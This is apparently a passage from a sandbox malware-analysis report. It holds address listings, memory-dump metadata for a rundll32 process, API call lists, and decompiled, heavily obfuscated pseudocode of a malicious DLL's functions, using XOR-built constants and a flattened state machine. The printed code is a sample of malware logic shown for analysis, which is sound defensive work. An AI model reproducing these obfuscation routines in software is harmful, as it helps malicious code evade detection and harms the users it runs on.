                                                                                                                    0x003399d5
                                                                                                                    0x003399dd
                                                                                                                    0x003399ea
                                                                                                                    0x003399ee
                                                                                                                    0x003399f6
                                                                                                                    0x003399fe
                                                                                                                    0x00339a06
                                                                                                                    0x00339a0e
                                                                                                                    0x00339a13
                                                                                                                    0x00339a18
                                                                                                                    0x00339a20
                                                                                                                    0x00339a28
                                                                                                                    0x00339a30
                                                                                                                    0x00339a38
                                                                                                                    0x00339a40
                                                                                                                    0x00339a48
                                                                                                                    0x00339a4d
                                                                                                                    0x00339a55
                                                                                                                    0x00339a55
                                                                                                                    0x00339a55
                                                                                                                    0x00339a5a
                                                                                                                    0x00000000
                                                                                                                    0x00339a5a
                                                                                                                    0x00339a6c
                                                                                                                    0x00339b32
                                                                                                                    0x00339b36
                                                                                                                    0x00339b3b
                                                                                                                    0x00339b3e
                                                                                                                    0x00339b41
                                                                                                                    0x00339b45
                                                                                                                    0x00339b4a
                                                                                                                    0x00000000
                                                                                                                    0x00339b4a
                                                                                                                    0x00339a78
                                                                                                                    0x00339ac5
                                                                                                                    0x00339ad8
                                                                                                                    0x00339add
                                                                                                                    0x00339ae0
                                                                                                                    0x00339ae3
                                                                                                                    0x00339ae5
                                                                                                                    0x00339afd
                                                                                                                    0x00339b02
                                                                                                                    0x00339b05
                                                                                                                    0x00339b09
                                                                                                                    0x00339b11
                                                                                                                    0x00339b15
                                                                                                                    0x00339b1a
                                                                                                                    0x00339b1d
                                                                                                                    0x00000000
                                                                                                                    0x00339b1d
                                                                                                                    0x00339a7a
                                                                                                                    0x00339a7c
                                                                                                                    0x00000000
                                                                                                                    0x00339b7a
                                                                                                                    0x00339a84
                                                                                                                    0x00000000
                                                                                                                    0x00339a8a
                                                                                                                    0x00339aae
                                                                                                                    0x00339ab3
                                                                                                                    0x00339ab6
                                                                                                                    0x00339abb
                                                                                                                    0x00339ac1
                                                                                                                    0x00339a55
                                                                                                                    0x00339a55
                                                                                                                    0x00339a55
                                                                                                                    0x00000000
                                                                                                                    0x00339a55
                                                                                                                    0x00339a55
                                                                                                                    0x00339abb
                                                                                                                    0x00339a84
                                                                                                                    0x00339b82
                                                                                                                    0x00339b82
                                                                                                                    0x00339b52
                                                                                                                    0x00339b57
                                                                                                                    0x00339b57
                                                                                                                    0x00339b57
                                                                                                                    0x00000000
                                                                                                                    0x00339a5a

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                    • API String ID: 0-1622084174
                                                                                                                    • Opcode ID: 8c0b32bf0257b242babe0bbf8338a302490777a0f6591e962819a4b8198b756f
                                                                                                                    • Instruction ID: 2ac700697f6fb34236c619c65c80030a4c276efd7227bcdadf3bf8ab7f2d00c7
                                                                                                                    • Opcode Fuzzy Hash: 8c0b32bf0257b242babe0bbf8338a302490777a0f6591e962819a4b8198b756f
                                                                                                                    • Instruction Fuzzy Hash: 72B12FB2908341DFC358CF25D58A90BFBF1BB84758F408A1DF59A96220D3B5D959CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003364E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003364E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E00340AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E003380E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E00348519(_v360, _v348, _v292);
								E00348519(_v352, _v388, _t422);
								E00348519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00334B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E0034F435( &_v292,  &_v284);
								} else {
									_t359 = E0034A666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x353e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x353e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x353e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E00348519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x353e08; // 0x0
							_t338 =  *0x353e08; // 0x0
							_t343 =  *0x353e08; // 0x0
							_t345 = E0034E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E00335548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E0033CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                    0x003364ec
                                                                                                                    0x003364f3
                                                                                                                    0x003364f5
                                                                                                                    0x003364fc
                                                                                                                    0x00336503
                                                                                                                    0x0033650a
                                                                                                                    0x00336511
                                                                                                                    0x00336518
                                                                                                                    0x00336519
                                                                                                                    0x0033651a
                                                                                                                    0x0033651f
                                                                                                                    0x00336527
                                                                                                                    0x0033652a
                                                                                                                    0x00336537
                                                                                                                    0x0033653f
                                                                                                                    0x00336541
                                                                                                                    0x00336549
                                                                                                                    0x0033654e
                                                                                                                    0x00336556
                                                                                                                    0x0033655e
                                                                                                                    0x00336566
                                                                                                                    0x00336574
                                                                                                                    0x00336579
                                                                                                                    0x0033657f
                                                                                                                    0x00336587
                                                                                                                    0x00336592
                                                                                                                    0x0033659a
                                                                                                                    0x003365a5
                                                                                                                    0x003365b2
                                                                                                                    0x003365b5
                                                                                                                    0x003365b9
                                                                                                                    0x003365c1
                                                                                                                    0x003365c9
                                                                                                                    0x003365d1
                                                                                                                    0x003365d9
                                                                                                                    0x003365e1
                                                                                                                    0x003365e6
                                                                                                                    0x003365ee
                                                                                                                    0x003365f6
                                                                                                                    0x003365fe
                                                                                                                    0x00336606
                                                                                                                    0x0033660e
                                                                                                                    0x00336616
                                                                                                                    0x0033661e
                                                                                                                    0x00336626
                                                                                                                    0x00336636
                                                                                                                    0x0033663a
                                                                                                                    0x00336642
                                                                                                                    0x0033664a
                                                                                                                    0x00336652
                                                                                                                    0x0033665a
                                                                                                                    0x00336662
                                                                                                                    0x00336674
                                                                                                                    0x00336677
                                                                                                                    0x0033667b
                                                                                                                    0x00336683
                                                                                                                    0x0033668b
                                                                                                                    0x00336690
                                                                                                                    0x00336698
                                                                                                                    0x003366a0
                                                                                                                    0x003366a8
                                                                                                                    0x003366b0
                                                                                                                    0x003366b8
                                                                                                                    0x003366c0
                                                                                                                    0x003366c8
                                                                                                                    0x003366d2
                                                                                                                    0x003366da
                                                                                                                    0x003366e2
                                                                                                                    0x003366ea
                                                                                                                    0x003366ef
                                                                                                                    0x003366f4
                                                                                                                    0x003366fc
                                                                                                                    0x00336704
                                                                                                                    0x00336712
                                                                                                                    0x00336717
                                                                                                                    0x0033671d
                                                                                                                    0x00336722
                                                                                                                    0x0033672a
                                                                                                                    0x00336732
                                                                                                                    0x0033673a
                                                                                                                    0x00336742
                                                                                                                    0x0033674a
                                                                                                                    0x00336757
                                                                                                                    0x0033675a
                                                                                                                    0x0033675e
                                                                                                                    0x00336766
                                                                                                                    0x0033676e
                                                                                                                    0x00336776
                                                                                                                    0x00336783
                                                                                                                    0x00336787
                                                                                                                    0x0033678f
                                                                                                                    0x00336797
                                                                                                                    0x0033679f
                                                                                                                    0x003367a7
                                                                                                                    0x003367af
                                                                                                                    0x003367b7
                                                                                                                    0x003367bf
                                                                                                                    0x003367c7
                                                                                                                    0x003367cf
                                                                                                                    0x003367d7
                                                                                                                    0x003367df
                                                                                                                    0x003367e7
                                                                                                                    0x003367ef
                                                                                                                    0x003367f7
                                                                                                                    0x003367ff
                                                                                                                    0x00336804
                                                                                                                    0x0033680c
                                                                                                                    0x00336814
                                                                                                                    0x0033681c
                                                                                                                    0x00336824
                                                                                                                    0x00336829
                                                                                                                    0x00336831
                                                                                                                    0x00336839
                                                                                                                    0x00336841
                                                                                                                    0x00336846
                                                                                                                    0x0033684e
                                                                                                                    0x00336856
                                                                                                                    0x0033685e
                                                                                                                    0x00336863
                                                                                                                    0x0033686b
                                                                                                                    0x00336873
                                                                                                                    0x0033687d
                                                                                                                    0x00336881
                                                                                                                    0x00336889
                                                                                                                    0x00336899
                                                                                                                    0x003368a1
                                                                                                                    0x003368a6
                                                                                                                    0x003368b0
                                                                                                                    0x003368b3
                                                                                                                    0x003368b7
                                                                                                                    0x003368bb
                                                                                                                    0x003368c3
                                                                                                                    0x003368c7
                                                                                                                    0x003368d2
                                                                                                                    0x003368dd
                                                                                                                    0x003368e8
                                                                                                                    0x003368f5
                                                                                                                    0x003368f9
                                                                                                                    0x00336901
                                                                                                                    0x00336909
                                                                                                                    0x0033690e
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691b
                                                                                                                    0x0033691d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336923
                                                                                                                    0x00336a56
                                                                                                                    0x00336a5b
                                                                                                                    0x00336a6d
                                                                                                                    0x00336a72
                                                                                                                    0x00336a73
                                                                                                                    0x00336a75
                                                                                                                    0x00336a7a
                                                                                                                    0x00336a7d
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033692f
                                                                                                                    0x00336a16
                                                                                                                    0x00336a25
                                                                                                                    0x00336a3d
                                                                                                                    0x00336a43
                                                                                                                    0x00336bc8
                                                                                                                    0x00336bc8
                                                                                                                    0x00000000
                                                                                                                    0x00336bc8
                                                                                                                    0x0033693b
                                                                                                                    0x003369d8
                                                                                                                    0x003369da
                                                                                                                    0x003369df
                                                                                                                    0x003369e6
                                                                                                                    0x003369ed
                                                                                                                    0x003369f4
                                                                                                                    0x003369fd
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336947
                                                                                                                    0x00336999
                                                                                                                    0x003369a9
                                                                                                                    0x0033699b
                                                                                                                    0x0033699b
                                                                                                                    0x0033699b
                                                                                                                    0x003369ae
                                                                                                                    0x003369b7
                                                                                                                    0x003369bc
                                                                                                                    0x00000000
                                                                                                                    0x003369bc
                                                                                                                    0x0033694f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336955
                                                                                                                    0x0033695e
                                                                                                                    0x00336960
                                                                                                                    0x00336963
                                                                                                                    0x00336966
                                                                                                                    0x0033696b
                                                                                                                    0x00336970
                                                                                                                    0x00336970
                                                                                                                    0x00336973
                                                                                                                    0x0033697a
                                                                                                                    0x00336bdb
                                                                                                                    0x00336be1
                                                                                                                    0x00336be8
                                                                                                                    0x00336bf1
                                                                                                                    0x00336980
                                                                                                                    0x00336980
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x0033697a
                                                                                                                    0x00336a8d
                                                                                                                    0x00336bbd
                                                                                                                    0x00336bc3
                                                                                                                    0x00000000
                                                                                                                    0x00336bc3
                                                                                                                    0x00336a99
                                                                                                                    0x00336b34
                                                                                                                    0x00336b4c
                                                                                                                    0x00336b7d
                                                                                                                    0x00336b89
                                                                                                                    0x00336b8e
                                                                                                                    0x00336b93
                                                                                                                    0x00336b9f
                                                                                                                    0x00336ba4
                                                                                                                    0x00336b95
                                                                                                                    0x00336b95
                                                                                                                    0x00336b95
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336aa5
                                                                                                                    0x00336b0f
                                                                                                                    0x00336b14
                                                                                                                    0x00336b19
                                                                                                                    0x00336b25
                                                                                                                    0x00336b1b
                                                                                                                    0x00336b1d
                                                                                                                    0x00336b22
                                                                                                                    0x00336b22
                                                                                                                    0x00336b2a
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00000000
                                                                                                                    0x00336916
                                                                                                                    0x00336916
                                                                                                                    0x00336aad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336ad6
                                                                                                                    0x00336adb
                                                                                                                    0x00336ae0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336ae6
                                                                                                                    0x00000000
                                                                                                                    0x00336bcd
                                                                                                                    0x00336bcd
                                                                                                                    0x00000000
                                                                                                                    0x00336bd9

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                    • API String ID: 0-2895984816
                                                                                                                    • Opcode ID: 72f910718383cc35cf534728289548bd09a59de76b7c065a4397717d8d4b5dbf
                                                                                                                    • Instruction ID: bb1f54a4f29ce5ca317d7d44b24e878a2ae1e84e8b36abfaa7f535f034d846f9
                                                                                                                    • Opcode Fuzzy Hash: 72f910718383cc35cf534728289548bd09a59de76b7c065a4397717d8d4b5dbf
                                                                                                                    • Instruction Fuzzy Hash: AE0246725083809FC7A5CF65C58AA5BBBE1FBC4358F20890DF5DA8A260C7B4D949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                    • CharUpperA.USER32 ref: 10021943
                                                                                                                    • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249967234-0
                                                                                                                    • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                    • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                    • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                    • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00335E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00335E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003420B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
